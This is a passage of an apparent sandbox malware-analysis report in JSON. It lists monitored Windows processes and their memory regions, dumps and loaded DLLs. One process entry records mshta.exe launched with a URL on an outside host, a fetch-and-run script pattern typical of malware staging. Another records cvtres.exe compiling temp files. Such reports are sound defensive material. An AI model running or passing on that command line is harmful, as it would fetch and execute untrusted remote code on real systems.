"id": "region_652", "name": "mscorpe.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorpe.dll", "region_type": "memory_mapped_file", "start_va": 8791557865472, "timestamp": "00:01:01.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_653", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:01.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 811008, "start_va": 21859663872, "type": "region", "version": 1 }, "end_va": 21860474879, "entry_point": 21859812720, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll", "id": "region_654", "name": "diasymreader.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll", "region_type": "memory_mapped_file", "start_va": 21859663872, "timestamp": "00:01:01.816", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000655-addr_0x0000000003ed0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_114", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 65863680, "type": "region", "version": 1 }, "end_va": 66912255, "entry_point": 0, "filename": null, "id": "region_655", "name": "private_0x0000000003ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 65863680, "timestamp": "00:01:02.078", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\RESEDB9.tmp\" \"c:\\Users\\aETAdzjz\\Desktop\\CSCED98.tmp\"", "filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cvtres.exe", "id": "proc_3", "image_name": "cvtres.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000656-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_115", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_656", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:02.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000657-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_116", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_657", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:02.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4247551, "entry_point": 4194304, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe", "id": "region_658", "name": "cvtres.exe", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cvtres.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:02.104", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_659", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:02.111", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_660", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:02.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000661-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_117", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_661", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:02.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_662", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:02.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_663", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:02.115", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000664-addr_0x000007fffffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_118", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_664", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:01:02.116", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000665-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_119", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_665", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:02.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_666", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:02.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_667", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:02.125", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000668-addr_0x00000000002f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_120", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_668", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:01:02.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_669", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:02.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_670", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:02.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_671", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_672", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_673", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000674-addr_0x00000000001c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_121", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_674", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:01:02.141", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000675-addr_0x0000000000410000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_675", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000676-addr_0x0000000000510000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_676", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000677-addr_0x0000000000550000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_677", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_678", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:02.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_679", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:02.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_680", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:02.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_681", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:02.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_682", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:02.146", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_683", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:02.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_684", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:02.147", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_4", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000701-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_701", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_702", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_703", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_704", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_705", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:02.791", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_706", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:02.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_707", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:02.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 4288479232, "type": "region", "version": 1 }, "end_va": 4288544767, "entry_point": 4288479232, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_708", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 4288479232, "timestamp": "00:01:02.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_709", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:02.800", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_710", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:02.802", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_711", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:02.802", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_712", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:02.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_714", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:02.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_715", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:02.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_716", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:02.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_717", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:02.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_718", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:02.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_719", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:02.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_720", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:02.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_721", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:02.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_722", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:02.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_723", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:02.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": 